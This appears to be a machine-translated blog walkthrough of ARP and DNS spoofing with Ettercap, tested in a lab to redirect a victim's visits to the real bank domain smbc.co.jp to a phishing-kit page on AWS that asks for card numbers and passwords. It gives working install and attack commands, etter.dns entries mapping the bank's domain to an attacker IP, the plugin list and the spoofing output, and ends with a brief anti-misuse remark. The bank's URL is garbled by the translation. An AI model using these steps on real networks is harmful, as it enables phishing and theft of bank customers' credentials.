개요

이번에는 Ettercap이라는 해킹 도구를 사용하여 APR 스푸핑 + DNS 스푸핑을 시도했습니다.
ARP 스푸핑은 ARP 프로토콜의 통신을 가장하여 동일한 세그먼트의 장비가 되는 중간자 공격으로, DNS 스푸핑은 DNS 쿼리에 대한 요청을 다시 작성하는 중간자 공격입니다.
이후에서는, 이 수법을 이용해 피해 머신으로부터 정규의 SMBC에의 액세스를 사기 사이트에 유도하는 공격을 검증하고 있습니다.

준비

구성

검증을 위해 다음과 같은 구성 준비했습니다.

공격 전

공격 후

공격용 머신 설정

공격용 머신으로서 DNS 서버나 피해 머신과 같은 세그먼트 내에 설치되어 있는 CentoOS의 이하 버전의 머신을 이용하여 Ettercap을 설치했습니다. EPEL 리포지토리를 사용하면 YUM에서 쉽게 설치할 수있었습니다.

/etc/redhat-release

CentOS release 6.10 (Final)

$ sudo yum -y install epel-release
$ sudo yum -y install ettercap.x86_64

Ettercap의 설정 파일에서 정규 사이트의 도메인과 개조 사이트의 IP 주소를 연결합니다.

/etc/ettercap/etter.dns

www.smbc.co.jp A 13.115.73.199
smbc.co.jp A 13.115.73.199

개조 사이트 준비

AWS의 EC2에 주 1에서 만든 Docker 컨테이너를 준비하고 SMBC 용 Phishing ToolKit을 Apache의 DocumentRoot에 설치했습니다.

검증 결과

우선 피해 머신의 WEB 브라우저로 SMBC의 사이트 h tp // w w. smbc. 이. jp / pr / 그럼 x. php에 HTTP 액세스 해 봅니다. HTTP 액세스는 HTTPS로 리디렉션되어 버립니다만, 정규의 사이트에는 「/pr/index.php」에 유효한 컨텐츠가 놓여 있지 않기 때문에 이하와 같이 표시됩니다.



그런 다음 공격 컴퓨터에서 다음 명령을 실행합니다.

# ettercap -TqM arp:remote /192.168.1.132// /192.168.1.36//

부팅 후 “h”를 누르면 Help가 표시됩니다.

Text only Interface activated...
Hit 'h' for inline help


Inline help:

 [vV]      - change the visualization mode
 [pP]      - activate a plugin
 [fF]      - (de)activate a filter
 [lL]      - print the hosts list
 [oO]      - print the profiles list
 [cC]      - print the connections list
 [sS]      - print interfaces statistics
 [<space>] - stop/cont printing packets
 [qQ]      - quit

사용할 플러그인을 선택하기 위해 "p"를 누르면 다음이 표시됩니다.

Available plugins :

[0]         arp_cop  1.1  Report suspicious ARP activity
[0]         autoadd  1.2  Automatically add new victims in the target range
[0]      chk_poison  1.1  Check if the poisoning had success
[0]       dns_spoof  1.1  Sends spoofed dns replies
[0]      dos_attack  1.0  Run a d.o.s. attack against an IP address
[0]           dummy  3.0  A plugin template (for developers)
[0]       find_conn  1.0  Search connections on a switched LAN
[0]   find_ettercap  2.0  Try to find ettercap activity
[0]         find_ip  1.0  Search an unused IP address in the subnet
[0]          finger  1.6  Fingerprint a remote host
[0]   finger_submit  1.0  Submit a fingerprint to ettercap's website
[0]       gre_relay  1.0  Tunnel broker for redirected GRE tunnels
[0]     gw_discover  1.0  Try to find the LAN gateway
[0]         isolate  1.0  Isolate an host from the lan
[0]       link_type  1.0  Check the link type (hub/switch)
[0]      nbns_spoof  1.1  Sends spoof NBNS replies & sends SMB challenges with custom challenge
[0]    pptp_chapms1  1.0  PPTP: Forces chapms-v1 from chapms-v2
[0]      pptp_clear  1.0  PPTP: Tries to force cleartext tunnel
[0]        pptp_pap  1.0  PPTP: Forces PAP authentication
[0]      pptp_reneg  1.0  PPTP: Forces tunnel re-negotiation
[0]      rand_flood  1.0  Flood the LAN with random MAC addresses
[0]  remote_browser  1.2  Sends visited URLs to the browser
[0]       reply_arp  1.0  Simple arp responder
[0]    repoison_arp  1.0  Repoison after broadcast ARP
[0]   scan_poisoner  1.0  Actively search other poisoners
[0]  search_promisc  1.2  Search promisc NICs in the LAN
[0]       smb_clear  1.0  Tries to force SMB cleartext auth
[0]        smb_down  1.0  Tries to force SMB to not use NTLM2 key auth
[0]    smurf_attack  1.0  Run a smurf attack against specified hosts
[0]     stp_mangler  1.0  Become root of a switches spanning tree

이번에는 dns_spoof 플러그인을 사용합니다.

Plugin name (0 to quit): dns_spoof
Activating dns_spoof plugin...

이것으로 준비 완료입니다.
다시 피해 머신의 WEB 브라우저에서 h tp // w w. smbc. 이. jp / pr / 그럼 x. php 에 HTTP 액세스하면 이번에는 카드 번호나 패스워드 등의 입력을 촉구하는 개조 사이트로 유도됩니다.



Ettercap에서는 다음 용으로 출력됩니다.

dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]

참조 자료

주 1 : AWS에서 Apache Killer를 사용해보십시오.

편집 후기

Ettercap을 이용하면 쉽게 ARP 스푸핑을 할 수 있으므로 사내 네트워크에 부정한 단말기의 접속을 검출하는 것은 필수군요. 또한이 도구는 악용을 위해 사용하지 마십시오.